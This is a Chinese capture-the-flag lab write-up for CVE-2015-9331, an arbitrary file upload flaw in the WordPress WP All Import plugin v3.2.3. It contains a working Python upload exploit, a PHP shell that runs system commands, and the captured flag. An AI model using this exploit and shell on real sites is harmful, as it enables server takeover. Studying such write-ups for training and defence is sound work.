春秋云镜 CVE-2015-9331

文章描述了一个WordPress插件WPAllImportv3.2.3中的任意文件上传漏洞,攻击者可通过发送请求上传恶意shell脚本,获取服务器权限。漏洞利用示例提供并展示了如何利用此漏洞获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

春秋云镜 CVE-2015-9331 wordpress插件 WordPress WP All Import plugin v3.2.3 任意文件上传

靶标介绍

wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传,可以上传shell。

启动场景

在这里插入图片描述

漏洞利用

exp

#/usr/local/bin/python3
# -*-coding:utf-8-*-
 
import requests,os
site="eci-2ze8y6cz5vszwgd99u5d.cloudeci1.ichunqiu.com"
file_to_upload ='shell.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print ("http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/%s" % "evil.php")

site处填域名,file_to_upload处填shell文件名。
shell如下

<?php
system('cat /flag');phpinfo();
?>

执行exp脚本
在这里插入图片描述
访问链接
在这里插入图片描述
得到flag

flag{3df8d04f-d7cd-4b22-a2aa-25ca6e8dde62}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值